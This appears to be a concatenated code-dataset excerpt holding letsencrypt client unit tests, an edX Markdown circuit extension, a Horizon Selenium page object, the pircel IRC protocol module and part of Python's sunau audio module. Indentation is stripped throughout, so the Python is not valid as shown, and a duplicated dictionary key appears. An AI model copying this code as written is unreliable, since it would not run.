installer.recovery_routine.assert_called_once_with()
@mock.patch("letsencrypt.client.zope.component.getUtility")
def test_deploy_certificate_restart_failure(self, mock_get_utility):
installer = mock.MagicMock()
installer.restart.side_effect = [errors.PluginError, None]
self.client.installer = installer
self.assertRaises(errors.PluginError, self.client.deploy_certificate,
["foo.bar"], "key", "cert", "chain", "fullchain")
self.assertEqual(mock_get_utility().add_message.call_count, 1)
installer.rollback_checkpoints.assert_called_once_with()
self.assertEqual(installer.restart.call_count, 2)
@mock.patch("letsencrypt.client.zope.component.getUtility")
def test_deploy_certificate_restart_failure2(self, mock_get_utility):
installer = mock.MagicMock()
installer.restart.side_effect = errors.PluginError
installer.rollback_checkpoints.side_effect = errors.ReverterError
self.client.installer = installer
self.assertRaises(errors.PluginError, self.client.deploy_certificate,
["foo.bar"], "key", "cert", "chain", "fullchain")
self.assertEqual(mock_get_utility().add_message.call_count, 1)
installer.rollback_checkpoints.assert_called_once_with()
self.assertEqual(installer.restart.call_count, 1)
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config(self, mock_enhancements):
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.Error,
self.client.enhance_config, ["foo.bar"], config)
mock_enhancements.ask.return_value = True
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = ["redirect"]
self.client.enhance_config(["foo.bar"], config)
installer.enhance.assert_called_once_with("foo.bar", "redirect", None)
self.assertEqual(installer.save.call_count, 1)
installer.restart.assert_called_once_with()
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config_no_ask(self, mock_enhancements):
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.Error,
self.client.enhance_config, ["foo.bar"], config)
mock_enhancements.ask.return_value = True
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = ["redirect", "ensure-http-header"]
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.client.enhance_config(["foo.bar"], config)
installer.enhance.assert_called_with("foo.bar", "redirect", None)
config = ConfigHelper(redirect=False, hsts=True, uir=False)
self.client.enhance_config(["foo.bar"], config)
installer.enhance.assert_called_with("foo.bar", "ensure-http-header",
"Strict-Transport-Security")
config = ConfigHelper(redirect=False, hsts=False, uir=True)
self.client.enhance_config(["foo.bar"], config)
installer.enhance.assert_called_with("foo.bar", "ensure-http-header",
"Upgrade-Insecure-Requests")
self.assertEqual(installer.save.call_count, 3)
self.assertEqual(installer.restart.call_count, 3)
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config_unsupported(self, mock_enhancements):
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = []
config = ConfigHelper(redirect=None, hsts=True, uir=True)
self.client.enhance_config(["foo.bar"], config)
installer.enhance.assert_not_called()
mock_enhancements.ask.assert_not_called()
def test_enhance_config_no_installer(self):
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.Error,
self.client.enhance_config, ["foo.bar"], config)
@mock.patch("letsencrypt.client.zope.component.getUtility")
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config_enhance_failure(self, mock_enhancements,
mock_get_utility):
mock_enhancements.ask.return_value = True
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = ["redirect"]
installer.enhance.side_effect = errors.PluginError
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.PluginError,
self.client.enhance_config, ["foo.bar"], config)
installer.recovery_routine.assert_called_once_with()
self.assertEqual(mock_get_utility().add_message.call_count, 1)
@mock.patch("letsencrypt.client.zope.component.getUtility")
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config_save_failure(self, mock_enhancements,
mock_get_utility):
mock_enhancements.ask.return_value = True
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = ["redirect"]
installer.save.side_effect = errors.PluginError
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.PluginError,
self.client.enhance_config, ["foo.bar"], config)
installer.recovery_routine.assert_called_once_with()
self.assertEqual(mock_get_utility().add_message.call_count, 1)
@mock.patch("letsencrypt.client.zope.component.getUtility")
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config_restart_failure(self, mock_enhancements,
mock_get_utility):
mock_enhancements.ask.return_value = True
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = ["redirect"]
installer.restart.side_effect = [errors.PluginError, None]
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.PluginError,
self.client.enhance_config, ["foo.bar"], config)
self.assertEqual(mock_get_utility().add_message.call_count, 1)
installer.rollback_checkpoints.assert_called_once_with()
self.assertEqual(installer.restart.call_count, 2)
@mock.patch("letsencrypt.client.zope.component.getUtility")
@mock.patch("letsencrypt.client.enhancements")
def test_enhance_config_restart_failure2(self, mock_enhancements,
mock_get_utility):
mock_enhancements.ask.return_value = True
installer = mock.MagicMock()
self.client.installer = installer
installer.supported_enhancements.return_value = ["redirect"]
installer.restart.side_effect = errors.PluginError
installer.rollback_checkpoints.side_effect = errors.ReverterError
config = ConfigHelper(redirect=True, hsts=False, uir=False)
self.assertRaises(errors.PluginError,
self.client.enhance_config, ["foo.bar"], config)
self.assertEqual(mock_get_utility().add_message.call_count, 1)
installer.rollback_checkpoints.assert_called_once_with()
self.assertEqual(installer.restart.call_count, 1)
class RollbackTest(unittest.TestCase):
"""Tests for letsencrypt.client.rollback."""
def setUp(self):
self.m_install = mock.MagicMock()
@classmethod
def _call(cls, checkpoints, side_effect):
from letsencrypt.client import rollback
with mock.patch("letsencrypt.client.plugin_selection.pick_installer") as mpi:
mpi.side_effect = side_effect
rollback(None, checkpoints, {}, mock.MagicMock())
def test_no_problems(self):
self._call(1, self.m_install)
self.assertEqual(self.m_install().rollback_checkpoints.call_count, 1)
self.assertEqual(self.m_install().restart.call_count, 1)
def test_no_installer(self):
self._call(1, None) # Just make sure no exceptions are raised
if __name__ == "__main__":
unittest.main() # pragma: no cover
| apache-2.0 |
chrisfilda/edx_platform | lms/djangoapps/course_wiki/plugins/markdownedx/mdx_circuit.py | 158 | 2645 | #!/usr/bin/env python
'''
Image Circuit Extension for Python-Markdown
======================================
Any single line beginning with circuit-schematic: and followed by data (which should be json data, but this
is not enforced at this level) will be displayed as a circuit schematic. This is simply an input element with
the value set to the data. It is left to javascript on the page to render that input as a circuit schematic.
ex:
circuit-schematic:[["r",[128,48,0],{"r":"1","_json_":0},["2","1"]],["view",0,0,2,null,null,null,null,null,null,null],["dc",{"0":0,"1":1,"I(_3)":-1}]]
(This is a schematic with a single one-ohm resistor. Note that this data is not meant to be user-editable.)
'''
import markdown
import re
from django.utils.html import escape
try:
# Markdown 2.1.0 changed from 2.0.3. We try importing the new version first,
# but import the 2.0.3 version if it fails
from markdown.util import etree
except ImportError:
from markdown import etree
class CircuitExtension(markdown.Extension):
def __init__(self, configs):
for key, value in configs:
self.setConfig(key, value)
def extendMarkdown(self, md, md_globals):
## Because Markdown treats contigous lines as one block of text, it is hard to match
## a regex that must occupy the whole line (like the circuit regex). This is why we have
## a preprocessor that inspects the lines and replaces the matched lines with text that is
## easier to match
md.preprocessors.add('circuit', CircuitPreprocessor(md), "_begin")
pattern = CircuitLink(r'processed-schematic:(?P<data>.*?)processed-schematic-end')
pattern.md = md
pattern.ext = self
md.inlinePatterns.add('circuit', pattern, "<reference")
class CircuitPreprocessor(markdown.preprocessors.Preprocessor):
preRegex = re.compile(r'^circuit-schematic:(?P<data>.*)$')
def run(self, lines):
def convertLine(line):
m = self.preRegex.match(line)
if m:
return 'processed-schematic:{0}processed-schematic-end'.format(m.group('data'))
else:
return line
return [convertLine(line) for line in lines]
class CircuitLink(markdown.inlinepatterns.Pattern):
def handleMatch(self, m):
data = m.group('data')
data = escape(data)
return etree.fromstring("<div align='center'><input type='hidden' parts='' value='" + data + "' analyses='' class='schematic ctrls' width='400' height='220'/></div>")
def makeExtension(configs=None):
to_return = CircuitExtension(configs=configs)
return to_return
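# Illustrative sketch (not part of the original file): registering the
# extension and converting a schematic line. The schematic JSON is a dummy
# value for demonstration.
#
# md = markdown.markdown(
#     'circuit-schematic:[["r",[128,48,0],{"r":"1"},["2","1"]]]',
#     extensions=[makeExtension(configs=[])])
# # The output contains the hidden <input class='schematic ctrls' ...> element
# # that page-side javascript renders as a circuit.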
| agpl-3.0 |
aaronorosen/horizon-congress | openstack_dashboard/test/integration_tests/pages/changepasswordpage.py | 13 | 2981 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from selenium.webdriver.common import by
from openstack_dashboard.test.integration_tests.pages import basepage
from openstack_dashboard.test.integration_tests.pages import pageobject
class ChangePasswordPage(basepage.BasePage):
@property
def modal(self):
return ChangePasswordPage.ChangePasswordModal(self.driver,
self.conf)
def change_password(self, current, new):
self.fill_field_element(
current, self.modal.current_password)
self.fill_field_element(
new, self.modal.new_password)
self.fill_field_element(
new, self.modal.confirm_new_password)
self.modal.click_on_change_button()
def reset_to_default_password(self, current):
if self.topbar.user.text == self.conf.identity.admin_username:
return self.change_password(current,
self.conf.identity.admin_password)
else:
return self.change_password(current,
self.conf.identity.password)
class ChangePasswordModal(pageobject.PageObject):
_current_password_locator = (by.By.CSS_SELECTOR,
'input#id_current_password')
_new_password_locator = (by.By.CSS_SELECTOR,
'input#id_new_password')
_confirm_new_password_locator = (by.By.CSS_SELECTOR,
'input#id_confirm_password')
_change_submit_button_locator = (by.By.CSS_SELECTOR,
'div.modal-footer button.btn')
@property
def current_password(self):
return self.get_element(*self._current_password_locator)
@property
def new_password(self):
return self.get_element(*self._new_password_locator)
@property
def confirm_new_password(self):
return self.get_element(*self._confirm_new_password_locator)
@property
def change_button(self):
return self.get_element(*self._change_submit_button_locator)
def click_on_change_button(self):
self.change_button.click()
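# Illustrative sketch (not part of the original file): how an integration test
# might drive this page object. `driver` and `conf` are placeholder fixtures
# assumed to be provided by the test harness.
#
# page = ChangePasswordPage(driver, conf)
# page.change_password('old-secret', 'new-secret')
# page.reset_to_default_password('new-secret')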
| apache-2.0 |
possel/pircel | pircel/protocol.py | 1 | 15500 | #!/usr/bin/env python3
# -*- coding: utf8 -*-
"""
pircel.protocol
---------------
This module defines functions and objects for interacting with an IRC server including:
- parsing IRC protocol messages received from the server
- generating IRC protocol messages to be sent back to the server
- a callback-based API for interacting with these that should be agnostic to the multiprocessing mechanism used
(e.g. it'll work with both asyncio and tornado if you set them up right; though twisted won't work at the moment
because it doesn't support python 3)
"""
import logging
import chardet
import pircel
import pircel.signals
logger = logging.getLogger(__name__)
verbatim_logger = logging.getLogger('{}.verbatim'.format(__name__))
signal_factory = pircel.signals.namespace('irc_protocol')
class Error(pircel.Error):
""" Root exception for protocol parsing errors. """
class UnknownNumericCommandError(Error):
""" Exception thrown when a numeric command is given but no symbolic version can be found. """
class UnknownModeCommandError(Error):
""" Exception thrown on unknown mode change command. """
def split_irc_line(s):
"""Breaks a message from an IRC server into its prefix, command, and arguments.
Copied straight from twisted, license and copyright for this function follows:
Copyright (c) 2001-2014
Allen Short
Andy Gayton
Andrew Bennetts
Antoine Pitrou
Apple Computer, Inc.
Ashwini Oruganti
Benjamin Bruheim
Bob Ippolito
Canonical Limited
Christopher Armstrong
David Reid
Donovan Preston
Eric Mangold
Eyal Lotem
Google Inc.
Hybrid Logic Ltd.
Hynek Schlawack
Itamar Turner-Trauring
James Knight
Jason A. Mobarak
Jean-Paul Calderone
Jessica McKellar
Jonathan Jacobs
Jonathan Lange
Jonathan D. Simms
Jürgen Hermann
Julian Berman
Kevin Horn
Kevin Turner
Laurens Van Houtven
Mary Gardiner
Matthew Lefkowitz
Massachusetts Institute of Technology
Moshe Zadka
Paul Swartz
Pavel Pergamenshchik
Ralph Meijer
Richard Wall
Sean Riley
Software Freedom Conservancy
Travis B. Hartwell
Thijs Triemstra
Thomas Herve
Timothy Allen
Tom Prince
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
prefix = ''
trailing = []
if not s:
# Raise an exception of some kind
pass
if s[0] == ':':
prefix, s = s[1:].split(' ', 1)
if s.find(' :') != -1:
s, trailing = s.split(' :', 1)
args = s.split()
args.append(trailing)
else:
args = s.split()
command = args.pop(0)
return prefix, command, args
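# Illustrative example (not part of the original file):
#
# >>> split_irc_line(':nick!user@host PRIVMSG #pircel :hello world')
# ('nick!user@host', 'PRIVMSG', ['#pircel', 'hello world'])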
def parse_identity(who):
""" Extract the parts out of an IRC user identifier string. """
nick, rest = who.split('!')
username, host = rest.split('@')
if username.startswith('~'):
username = username[1:]
return nick, username, host
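# Illustrative example (not part of the original file): the leading '~' that
# some servers prepend to unverified usernames is stripped.
#
# >>> parse_identity('nick!~user@example.com')
# ('nick', 'user', 'example.com')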
def get_symbolic_command(command):
""" Normalizes both numeric and symbolic commands into just symbolic commands. """
if command.isdecimal():
try:
return numeric_to_symbolic[command]
except KeyError as e:
raise UnknownNumericCommandError("No numeric command found: '{}'".format(command)) from e
else:
return command
def decode(line):
""" Attempts to decode the line with utf8 but falls back to chardet otherwise. """
try:
line = str(line, encoding='utf8')
except UnicodeDecodeError:
logger.debug('UTF8 decode failed, bytes: %s', line)
encoding = chardet.detect(line)['encoding']
logger.debug('Tried autodetecting and got %s, decoding now', encoding)
line = str(line, encoding=encoding)
except TypeError as e:
if e.args[0] != 'decoding str is not supported':
raise
return line
def parse_line(line):
""" Normalizes the line from the server and splits it into component parts. """
line = decode(line)
line = line.strip()
return split_irc_line(line)
class IRCServerHandler:
def __init__(self, identity):
""" Protocol parser (and response generator) for an IRC server.
Args:
identity (User object): "Our" nick and user name etc.
"""
self._write = None
self.identity = identity
# Default values
self.motd = ''
@property
def _user_string(self):
return ':{}!~{}@localhost'.format(self.identity.nick, self.identity.username)
# =========================================================================
# Parsing and "reading"
# ---------------------
#
# Methods that result from a new input from the IRC server.
# =========================================================================
def handle_line(self, line):
verbatim_logger.debug(line)
# Parse the line
prefix, command, args = parse_line(line)
try:
symbolic_command = get_symbolic_command(command)
except UnknownNumericCommandError:
self.log_unhandled(line)
return
# local callbacks deal with the protocol stuff
try:
handler_name = 'on_{}'.format(symbolic_command.lower())
handler = getattr(self, handler_name)
except AttributeError:
handled = False
else:
handler(prefix, *args)
handled = True
# user callbacks do whatever they want them to do
signal = signal_factory(symbolic_command.lower())
signal.send(self, prefix=prefix, args=args)
if signal.receivers:
handled = True
if not handled:
self.log_unhandled(line)
def log_unhandled(self, line):
""" Called when we encounter a command we either don't know or don't have a handler for.
Method rather than function because I might later make it send debug logging over IRC sometimes.
"""
logger.warning('Unhandled: %s', line.decode().rstrip())
# =========================================================================
# =========================================================================
# Generating and "writing"
# ------------------------
#
# Methods that ultimately call self._write or are used in other methods in
# this section.
#
# TODO: Should public API functions like `who` and `connect` be in here? Is
# this an appropriate description for this section?
# =========================================================================
@property # Why is this a property?
def write_function(self):
return self._write
@write_function.setter
def write_function(self, new_write_function):
self._write = new_write_function
def pong(self, value):
self._write('PONG :{}'.format(value))
def connect(self):
self._write('NICK {}'.format(self.identity.nick))
self._write('USER {} 0 * :{}'.format(self.identity.username, self.identity.realname))
def who(self, mask):
self._write('WHO {}'.format(mask))
def join(self, channel, password=None):
logger.debug('Joining %s', channel)
if password:
self._write('JOIN {} {}'.format(channel, password))
else:
self._write('JOIN {}'.format(channel))
def part(self, channel):
self._write('PART {}'.format(channel))
def quit(self, message):
self._write('QUIT :{}'.format(message))
def _split_line_channel_command(self, command, channel, message):
if not isinstance(message, (str, bytes)):
message = str(message)
        for line in message.split('\n'):
            # Build a fresh command string per line; reusing `command` here
            # would nest each previous line into the next message.
            line_command = '{} {} :{}'.format(command, channel, line)
            self._write(line_command)
            self.handle_line('{} {}'.format(self._user_string, line_command))
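    # Illustrative example (not part of the original class): a multi-line
    # message is written as one command per line.
    #
    #   handler.send_message('#chan', 'line one\nline two')
    #   # writes: PRIVMSG #chan :line one
    #   #         PRIVMSG #chan :line two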
def send_message(self, channel, message):
self._split_line_channel_command('PRIVMSG', channel, message)
def send_notice(self, channel, message):
self._split_line_channel_command('NOTICE', channel, message)
def send_ping(self, value):
self._write('PING {}'.format(value))
def change_nick(self, new_nick):
self._write('NICK {}'.format(new_nick))
self.identity.nick = new_nick
# =========================================================================
# =========================================================================
# Callback API
# ------------
#
# The primary intended mechanism for interacting with this module, a user
# will instantiate this class then add callbacks where they want.
#
# A callback is any old callable, details in the docstring for
# `add_callback`.
# =========================================================================
def add_callback(self, signal, callback, weak=True):
""" Attach a function to be called on an IRC command (specified symbolically).
The function will be called with the following args:
* The calling IRCServerHandler object
* The prefix of the command (usually who it's from?)
* The remaining arguments from the command
For example the `join` signal will be called with `(self, who, channel)`.
"""
signal_factory(signal).connect(callback, sender=self, weak=weak)
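    # Illustrative usage (not part of the original class; assumes the
    # blinker-style signals used by handle_line above, which pass `prefix`
    # and `args` as keyword arguments):
    #
    #   def on_join(sender, prefix=None, args=None):
    #       print('JOIN from', prefix, args)
    #   handler.add_callback('join', on_join, weak=False)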
def remove_callback(self, signal, callback):
signal_factory(signal).disconnect(callback, sender=self)
# =========================================================================
# =========================================================================
# Default handlers
# ----------------
#
# So far just ping responding. In future might handle protocol negotiation
# bits like character encoding and the like.
# =========================================================================
def on_ping(self, prefix, token, *args):
logger.debug('Ping received: %s, %s', prefix, token)
self.pong(token)
# =========================================================================
symbolic_to_numeric = {
"RPL_WELCOME": '001',
"RPL_YOURHOST": '002',
"RPL_CREATED": '003',
"RPL_MYINFO": '004',
"RPL_ISUPPORT": '005',
"RPL_BOUNCE": '010',
"RPL_STATSCONN": '250',
"RPL_LOCALUSERS": '265',
"RPL_GLOBALUSERS": '266',
"RPL_USERHOST": '302',
"RPL_ISON": '303',
"RPL_AWAY": '301',
"RPL_UNAWAY": '305',
"RPL_NOWAWAY": '306',
"RPL_WHOISUSER": '311',
"RPL_WHOISSERVER": '312',
"RPL_WHOISOPERATOR": '313',
"RPL_WHOISIDLE": '317',
"RPL_ENDOFWHOIS": '318',
"RPL_WHOISCHANNELS": '319',
"RPL_WHOWASUSER": '314',
"RPL_ENDOFWHOWAS": '369',
"RPL_LISTSTART": '321',
"RPL_LIST": '322',
"RPL_LISTEND": '323',
"RPL_UNIQOPIS": '325',
"RPL_CHANNELMODEIS": '324',
"RPL_NOTOPIC": '331',
"RPL_TOPIC": '332',
"RPL_TOPICWHOTIME": '333',
"RPL_INVITING": '341',
"RPL_SUMMONING": '342',
"RPL_INVITELIST": '346',
"RPL_ENDOFINVITELIST": '347',
"RPL_EXCEPTLIST": '348',
"RPL_ENDOFEXCEPTLIST": '349',
"RPL_VERSION": '351',
"RPL_WHOREPLY": '352',
"RPL_ENDOFWHO": '315',
"RPL_NAMREPLY": '353',
"RPL_ENDOFNAMES": '366',
"RPL_LINKS": '364',
"RPL_ENDOFLINKS": '365',
"RPL_BANLIST": '367',
"RPL_ENDOFBANLIST": '368',
"RPL_INFO": '371',
"RPL_ENDOFINFO": '374',
"RPL_MOTDSTART": '375',
"RPL_MOTD": '372',
"RPL_ENDOFMOTD": '376',
"RPL_YOUREOPER": '381',
"RPL_REHASHING": '382',
"RPL_YOURESERVICE": '383',
"RPL_TIME": '391',
"RPL_USERSSTART": '392',
"RPL_USERS": '393',
"RPL_ENDOFUSERS": '394',
"RPL_NOUSERS": '395',
"RPL_TRACELINK": '200',
"RPL_TRACECONNECTING": '201',
"RPL_TRACEHANDSHAKE": '202',
"RPL_TRACEUNKNOWN": '203',
"RPL_TRACEOPERATOR": '204',
"RPL_TRACEUSER": '205',
"RPL_TRACESERVER": '206',
"RPL_TRACESERVICE": '207',
"RPL_TRACENEWTYPE": '208',
"RPL_TRACECLASS": '209',
"RPL_TRACERECONNECT": '210',
"RPL_TRACELOG": '261',
"RPL_TRACEEND": '262',
"RPL_STATSLINKINFO": '211',
"RPL_STATSCOMMANDS": '212',
"RPL_ENDOFSTATS": '219',
"RPL_STATSUPTIME": '242',
"RPL_STATSOLINE": '243',
"RPL_UMODEIS": '221',
"RPL_SERVLIST": '234',
"RPL_SERVLISTEND": '235',
"RPL_LUSERCLIENT": '251',
"RPL_LUSEROP": '252',
"RPL_LUSERUNKNOWN": '253',
"RPL_LUSERCHANNELS": '254',
"RPL_LUSERME": '255',
"RPL_ADMINME": '256',
"RPL_ADMINLOC": '257',
"RPL_ADMINLOC": '258',
"RPL_ADMINEMAIL": '259',
"RPL_TRYAGAIN": '263',
"ERR_NOSUCHNICK": '401',
"ERR_NOSUCHSERVER": '402',
"ERR_NOSUCHCHANNEL": '403',
"ERR_CANNOTSENDTOCHAN": '404',
"ERR_TOOMANYCHANNELS": '405',
"ERR_WASNOSUCHNICK": '406',
"ERR_TOOMANYTARGETS": '407',
"ERR_NOSUCHSERVICE": '408',
"ERR_NOORIGIN": '409',
"ERR_NORECIPIENT": '411',
"ERR_NOTEXTTOSEND": '412',
"ERR_NOTOPLEVEL": '413',
"ERR_WILDTOPLEVEL": '414',
"ERR_BADMASK": '415',
"ERR_UNKNOWNCOMMAND": '421',
"ERR_NOMOTD": '422',
"ERR_NOADMININFO": '423',
"ERR_FILEERROR": '424',
"ERR_NONICKNAMEGIVEN": '431',
"ERR_ERRONEUSNICKNAME": '432',
"ERR_NICKNAMEINUSE": '433',
"ERR_NICKCOLLISION": '436',
"ERR_UNAVAILRESOURCE": '437',
"ERR_USERNOTINCHANNEL": '441',
"ERR_NOTONCHANNEL": '442',
"ERR_USERONCHANNEL": '443',
"ERR_NOLOGIN": '444',
"ERR_SUMMONDISABLED": '445',
"ERR_USERSDISABLED": '446',
"ERR_NOTREGISTERED": '451',
"ERR_NEEDMOREPARAMS": '461',
"ERR_ALREADYREGISTRED": '462',
"ERR_NOPERMFORHOST": '463',
"ERR_PASSWDMISMATCH": '464',
"ERR_YOUREBANNEDCREEP": '465',
"ERR_YOUWILLBEBANNED": '466',
"ERR_KEYSET": '467',
"ERR_CHANNELISFULL": '471',
"ERR_UNKNOWNMODE": '472',
"ERR_INVITEONLYCHAN": '473',
"ERR_BANNEDFROMCHAN": '474',
"ERR_BADCHANNELKEY": '475',
"ERR_BADCHANMASK": '476',
"ERR_NOCHANMODES": '477',
"ERR_BANLISTFULL": '478',
"ERR_NOPRIVILEGES": '481',
"ERR_CHANOPRIVSNEEDED": '482',
"ERR_CANTKILLSERVER": '483',
"ERR_RESTRICTED": '484',
"ERR_UNIQOPPRIVSNEEDED": '485',
"ERR_NOOPERHOST": '491',
"ERR_NOSERVICEHOST": '492',
"ERR_UMODEUNKNOWNFLAG": '501',
"ERR_USERSDONTMATCH": '502',
}
numeric_to_symbolic = {v: k for k, v in symbolic_to_numeric.items()}
| bsd-3-clause |
ZHAW-INES/rioxo-uClinux-dist | user/python/python-2.4.4/Lib/sunau.py | 82 | 16515 | """Stuff to parse Sun and NeXT audio files.
An audio file consists of a header followed by the data. The structure
of the header is as follows.
+---------------+
| magic word |
+---------------+
| header size |
+---------------+
| data size |
+---------------+
| encoding |
+---------------+
| sample rate |
+---------------+
| # of channels |
+---------------+
| info |
| |
+---------------+
The magic word consists of the 4 characters '.snd'. Apart from the
info field, all header fields are 4 bytes in size. They are all
32-bit unsigned integers encoded in big-endian byte order.
The header size really gives the start of the data.
The data size is the physical size of the data. From the other
parameters the number of frames can be calculated.
The encoding gives the way in which audio samples are encoded.
Possible values are listed below.
The info field currently consists of an ASCII string giving a
human-readable description of the audio file. The info field is
padded with NUL bytes to the header size.
Usage.
Reading audio files:
f = sunau.open(file, 'r')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods read(), seek(), and close().
When the setpos() and rewind() methods are not used, the seek()
method is not necessary.
This returns an instance of a class with the following public methods:
getnchannels() -- returns number of audio channels (1 for
mono, 2 for stereo)
getsampwidth() -- returns sample width in bytes
getframerate() -- returns sampling frequency
getnframes() -- returns number of audio frames
getcomptype() -- returns compression type ('NONE' or 'ULAW')
getcompname() -- returns human-readable version of
compression type ('not compressed' matches 'NONE')
getparams() -- returns a tuple consisting of all of the
above in the above order
getmarkers() -- returns None (for compatibility with the
aifc module)
getmark(id) -- raises an error since the mark does not
exist (for compatibility with the aifc module)
readframes(n) -- returns at most n frames of audio
rewind() -- rewind to the beginning of the audio stream
setpos(pos) -- seek to the specified position
tell() -- return the current position
close() -- close the instance (make it unusable)
The position returned by tell() and the position given to setpos()
are compatible and have nothing to do with the actual position in the
file.
The close() method is called automatically when the class instance
is destroyed.
Writing audio files:
f = sunau.open(file, 'w')
where file is either the name of a file or an open file pointer.
The open file pointer must have methods write(), tell(), seek(), and
close().
This returns an instance of a class with the following public methods:
setnchannels(n) -- set the number of channels
setsampwidth(n) -- set the sample width
setframerate(n) -- set the frame rate
setnframes(n) -- set the number of frames
setcomptype(type, name)
-- set the compression type and the
human-readable compression type
setparams(tuple)-- set all parameters at once
tell() -- return current position in output file
writeframesraw(data)
                -- write audio frames without patching up the
file header
writeframes(data)
-- write audio frames and patch up the file header
close() -- patch up the file header and close the
output file
You should set the parameters before the first writeframesraw or
writeframes. The total number of frames does not need to be set,
but when it is set to the correct value, the header does not have to
be patched up.
It is best to first set all parameters, with the possible exception of the
compression type, and then write audio frames using writeframesraw.
When all frames have been written, either call writeframes('') or
close() to patch up the sizes in the header.
The close() method is called automatically when the class instance
is destroyed.
"""
# from <multimedia/audio_filehdr.h>
AUDIO_FILE_MAGIC = 0x2e736e64
AUDIO_FILE_ENCODING_MULAW_8 = 1
AUDIO_FILE_ENCODING_LINEAR_8 = 2
AUDIO_FILE_ENCODING_LINEAR_16 = 3
AUDIO_FILE_ENCODING_LINEAR_24 = 4
AUDIO_FILE_ENCODING_LINEAR_32 = 5
AUDIO_FILE_ENCODING_FLOAT = 6
AUDIO_FILE_ENCODING_DOUBLE = 7
AUDIO_FILE_ENCODING_ADPCM_G721 = 23
AUDIO_FILE_ENCODING_ADPCM_G722 = 24
AUDIO_FILE_ENCODING_ADPCM_G723_3 = 25
AUDIO_FILE_ENCODING_ADPCM_G723_5 = 26
AUDIO_FILE_ENCODING_ALAW_8 = 27
# from <multimedia/audio_hdr.h>
AUDIO_UNKNOWN_SIZE = 0xFFFFFFFFL # ((unsigned)(~0))
_simple_encodings = [AUDIO_FILE_ENCODING_MULAW_8,
AUDIO_FILE_ENCODING_LINEAR_8,
AUDIO_FILE_ENCODING_LINEAR_16,
AUDIO_FILE_ENCODING_LINEAR_24,
AUDIO_FILE_ENCODING_LINEAR_32,
AUDIO_FILE_ENCODING_ALAW_8]
class Error(Exception):
pass
def _read_u32(file):
x = 0L
for i in range(4):
byte = file.read(1)
if byte == '':
raise EOFError
x = x*256 + ord(byte)
return x
def _write_u32(file, x):
data = []
for i in range(4):
d, m = divmod(x, 256)
data.insert(0, m)
x = d
for i in range(4):
file.write(chr(int(data[i])))
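# Illustrative round trip (not part of the original module; assumes a
# StringIO buffer as the file object). The four bytes of AUDIO_FILE_MAGIC
# spell out the '.snd' magic word in big-endian order:
#
#   import StringIO
#   buf = StringIO.StringIO()
#   _write_u32(buf, AUDIO_FILE_MAGIC)
#   buf.getvalue()                          # -> '.snd'
#   buf.seek(0)
#   _read_u32(buf) == AUDIO_FILE_MAGIC      # -> True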
class Au_read:
def __init__(self, f):
if type(f) == type(''):
import __builtin__
f = __builtin__.open(f, 'rb')
self.initfp(f)
def __del__(self):
if self._file:
self.close()
def initfp(self, file):
self._file = file
self._soundpos = 0
magic = int(_read_u32(file))
if magic != AUDIO_FILE_MAGIC:
raise Error, 'bad magic number'
self._hdr_size = int(_read_u32(file))
if self._hdr_size < 24:
raise Error, 'header size too small'
if self._hdr_size > 100:
raise Error, 'header size ridiculously large'
self._data_size = _read_u32(file)
if self._data_size != AUDIO_UNKNOWN_SIZE:
self._data_size = int(self._data_size)
self._encoding = int(_read_u32(file))
if self._encoding not in _simple_encodings:
raise Error, 'encoding not (yet) supported'
if self._encoding in (AUDIO_FILE_ENCODING_MULAW_8,
AUDIO_FILE_ENCODING_ALAW_8):
self._sampwidth = 2
self._framesize = 1
elif self._encoding == AUDIO_FILE_ENCODING_LINEAR_8:
self._framesize = self._sampwidth = 1
elif self._encoding == AUDIO_FILE_ENCODING_LINEAR_16:
self._framesize = self._sampwidth = 2
elif self._encoding == AUDIO_FILE_ENCODING_LINEAR_24:
self._framesize = self._sampwidth = 3
elif self._encoding == AUDIO_FILE_ENCODING_LINEAR_32:
self._framesize = self._sampwidth = 4
else:
raise Error, 'unknown encoding'
self._framerate = int(_read_u32(file))
self._nchannels = int(_read_u32(file))
self._framesize = self._framesize * self._nchannels
